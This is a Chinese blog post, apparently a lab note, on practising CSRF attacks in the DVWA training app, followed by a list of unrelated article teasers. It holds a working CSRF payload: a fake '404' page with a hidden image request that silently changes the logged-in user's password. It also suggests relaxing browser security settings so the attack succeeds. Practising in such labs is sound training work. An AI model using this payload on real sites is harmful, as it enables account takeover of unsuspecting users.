【渗透测试】|基于dvwa的CSRF初级,中级,高级

一、渗透测试

二、渗透测试过程中遇到的问题和解决
在初级csrf中,想要通过伪造一个404页面,达到修改密码的效果
伪造404页面的html代码如下:

<html>
<head>
</head>
<body>
<img src="http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#" border='0' style="display:none;"/>
<h1>404<h1>
<h2>file not foundww.<h2>
</body>
</html>

通过打开这个html,页面出现了404,但是密码并没有更改成功

直接通过http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#,密码是可以更改成功的。

解决: 关闭浏览器的一些安全设置,火狐浏览器如图:
在这里插入图片描述
解决过程:
通过html打开404页面时,发现cookie的secutiry 为 impossible,而直接在dvwa中修改密码的cookie的secutiry 为 low,两者的phpsessid也不一样,各种查资料,发现可能的浏览器的安全设置导致的。。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/658457.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Docker是什么?使用场景作用及Docker的安装和启动详解

Docker是什么?使用场景作用及Docker的安装和启动详解

目录 Docker是什么&#xff1f; Docker的发展 Docker的安装 Docker使用 Docker的运行机制 第一个Docker容器 进入Docker容器 客户机访问容器 Docker是什么&#xff1f; Docker 是一个开源的应用容器引擎&#xff0c;基于 Go 语言 并遵从 Apache2.0 协议开源。 Docker …
阅读更多...
Biological Psychiatry:内源性功能连接的特定模式与强迫症的伤害回避有关

Biological Psychiatry:内源性功能连接的特定模式与强迫症的伤害回避有关

摘要 强迫症(OCD)患者通常在没有实际威胁的情况下表现出持续的回避行为。强迫症对生活质量的影响和患者之间的异质性使得寻找新的大脑-行为干预目标十分有必要。基于啮齿类动物和非人灵长类动物持续回避行为的机制和解剖学研究&#xff0c;本研究的目标是测试持续回避行为相关…
阅读更多...
本科java菜鸡,分享腾讯菜鸟京东面试经历

本科java菜鸡,分享腾讯菜鸟京东面试经历

楼主本科菜鸡一个&#xff0c;菜鸟三面挂掉&#xff0c;腾讯二面就挂了&#xff0c;美团携程58集团的笔试做过之后全部都石沉大海&#xff0c;现在实在缺乏实力追求选择空间&#xff0c;望大佬不要嘲笑。这里给大家分享一波面经造福后仁吧。 菜鸟网络 菜鸟是我2月27号就找学长…
阅读更多...
什么是抗压能力?如何判断自己的抗压能力?

什么是抗压能力?如何判断自己的抗压能力?

什么是抗压能力&#xff1f; 抗压能力&#xff0c;也叫心理承受能力&#xff0c;指的是面对外界的压力&#xff0c;逆境&#xff0c;困境和挑战&#xff0c;能够有效的调整自己的心态&#xff0c;有效的应对和解决问题的能力。 抗压能力涉及多个方面&#xff0c;比如&#xf…
阅读更多...
cesium 地形加载

cesium 地形加载

1.效果图&#xff1a; 2.cesium 的基础配置 //无token会导致球体无法显示 Cesium.Ion.defaultAccessToken "your token"; // 官网网配置的tokenvar viewer new Cesium.Viewer(cesiumContainer, {geocoder: false,//控制地图是否显示一个地理编码&#xff08;geocodi…
阅读更多...
apexcharts数据可视化之雷达图

apexcharts数据可视化之雷达图

apexcharts数据可视化之雷达图 有完整配套的Python后端代码。 本教程主要会介绍如下图形绘制方式&#xff1a; 基础雷达图多组数据雷达图雷达图标记点 基础雷达图 import ApexChart from react-apexcharts;export function BasicRadar() {// 数据序列const series [{name…
阅读更多...
香橙派OrangePi AIpro上手笔记——之USB摄像头目标检测方案测试(一)

香橙派OrangePi AIpro上手笔记——之USB摄像头目标检测方案测试(一)

整期笔记索引 香橙派OrangePi AIpro上手笔记——之USB摄像头目标检测方案测试&#xff08;一&#xff09; 香橙派OrangePi AIpro上手笔记——之USB摄像头目标检测方案测试&#xff08;二&#xff09; Orange Pi AIPro开发板&#xff1a;昇腾AI处理器的强劲性能与广泛应用前景 在…
阅读更多...
Java-文件操作

Java-文件操作

一、创建文件 1.创建文件夹 创建文件夹时&#xff0c;注意两个条件&#xff0c;该路径对应的是否为目录&#xff08;dir&#xff09;&#xff0c;该文件夹是否存在。 File Apathnew File("./文件夹A"); //当前路径文件夹的存储路径if(!Apath.exists() &&am…
阅读更多...
Midjourney如何控制光照?提示词灵感来了!

Midjourney如何控制光照?提示词灵感来了!

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 Midjourney如何控制光照&#xff1f;提示词灵感来了&#xff01;文章目录 前言总结 前言 Midjourney v6 已经更新好久了&#xff0c;你知道有哪些可以控制光照效果的关键词吗…
阅读更多...
为什么宋以前权臣篡位多、宋以后权臣篡位少?

为什么宋以前权臣篡位多、宋以后权臣篡位少?

时代不同&#xff0c;主要问题也不同。天下的大气候&#xff0c;自然就要左右王朝的小气候。权臣篡位&#xff0c;得先有权臣。但是&#xff0c;如果当权臣都没有了&#xff0c;又怎么可能有权臣篡位呢&#xff1f;这是一个社会基础的变化。宋以后的主要矛盾是中原和草原的争锋…
阅读更多...
Dify快速接入微信

Dify快速接入微信

一、Dify简介 项目官网&#xff1a;Dify.AI 生成式 AI 应用创新引擎 Dify 是一款开源的大语言模型(LLM) 应用开发平台。它融合了后端即服务&#xff08;Backend as Service&#xff09;和 LLMOps 的理念&#xff0c;使开发者可以快速搭建生产级的生成式 AI 应用。即使你是非…
阅读更多...
【网络】网络编程套接字

【网络】网络编程套接字

一、知识提及 1.源IP地址和目的IP地址 在IP数据包头部中, 有两个IP地址, 分别叫做源IP地址, 和目的IP地址 2.端口号 端口号(port)是传输层协议的内容. 端口号是一个2字节16位的整数;端口号用来标识一个进程, 告诉操作系统, 当前的这个数据要交给哪一个进程来处理;IP地址 …
阅读更多...
企业文件加密实现数据泄露防护

企业文件加密实现数据泄露防护

在数字化时代&#xff0c;数据成为企业最宝贵的资产之一。然而&#xff0c;数据泄露事件频发&#xff0c;给企业带来了巨大的经济损失和声誉风险。为了保护企业的核心利益&#xff0c;实现数据泄露防护&#xff0c;企业必须采取有效的文件加密措施。 一、数据泄露的严重性 数据…
阅读更多...
大疆、猛犸、西圣无线麦克风哪个牌子好?大疆、西圣麦克风测评PK

大疆、猛犸、西圣无线麦克风哪个牌子好?大疆、西圣麦克风测评PK

在当今这个全民参与媒体创作的时代&#xff0c;视频分享已经崛起为引领流行文化的关键力量。随着自媒体领域的竞争日益白热化&#xff0c;要想在浩瀚的内容海洋中脱颖而出&#xff0c;创作出卓越的作品无疑是吸引观众目光的核心要素。然而想要成功打造这样的佳作&#xff0c;除…
阅读更多...
目标检测——水下物体检测数据集

目标检测——水下物体检测数据集

引言 亲爱的读者们&#xff0c;您是否在寻找某个特定的数据集&#xff0c;用于研究或项目实践&#xff1f;欢迎您在评论区留言&#xff0c;或者通过公众号私信告诉我&#xff0c;您想要的数据集的类型主题。小编会竭尽全力为您寻找&#xff0c;并在找到后第一时间与您分享。 …
阅读更多...
[C#]使用C#部署yolov8的目标检测tensorrt模型

[C#]使用C#部署yolov8的目标检测tensorrt模型

【测试通过环境】 win10 x64 vs2019 cuda11.7cudnn8.8.0 TensorRT-8.6.1.6 opencvsharp4.9.0 .NET Framework4.7.2 NVIDIA GeForce RTX 2070 Super 版本和上述环境版本不一样的需要重新编译TensorRtExtern.dll&#xff0c;TensorRtExtern源码地址&#xff1a;TensorRT-CShar…
阅读更多...
Epic Pen Pro v3 解锁版安装教程 (屏幕实时标记注释工具)

Epic Pen Pro v3 解锁版安装教程 (屏幕实时标记注释工具)

前言 Epic Pen是一款功能强大的屏幕标记工具&#xff0c;允许您在屏幕上绘图或书写&#xff0c;而无需在后台与软件交互。这意味着您几乎可以注释任何东西&#xff01;使用我们流行的屏幕标记和Windows数字白板工具Epic Pen编写、绘制和突出显示&#xff0c;包括演示文稿软件&…
阅读更多...
AlexNet神经网络训练

AlexNet神经网络训练

导包 import tensorflow as tffrom tensorflow.keras import datasets, layers, models 加载Fashion-MNIST数据集 (train_images, train_labels), (test_images, test_labels) datasets.fashion_mnist.load_data() 归一化像素值到[0, 1]区间 train_images, test_images t…
阅读更多...
springboot vue 开源 会员收银系统 (3) 会员模块开发

springboot vue 开源 会员收银系统 (3) 会员模块开发

前言 完整版演示 前面我们对会员系统 springboot vue 开源 会员收银系统 (2) 搭建基础框架 进行了脚手件的搭建 下面我们将从会员模块进行开发 在此之前我们先简单梳理一下会员系统的导图 可以看出会员是贯穿全部的 所以我们在此梳理一下会员表的字段 CREATE TABLE business…
阅读更多...
决策树算法实战

决策树算法实战

本实战主要目标是讲解如何使用sklearn库来构造决策树&#xff0c;包括其中的一些参数的使用&#xff0c;以及参数调优对模型精确度的影响。 1. 数据处理 导入Pandas和Matplotlib两个库。 # 导入Pandas和Matplotlib两个库 %matplotlib inline import matplotlib.pyplot as pl…
阅读更多...
最新文章

Copyright @ 2022~2023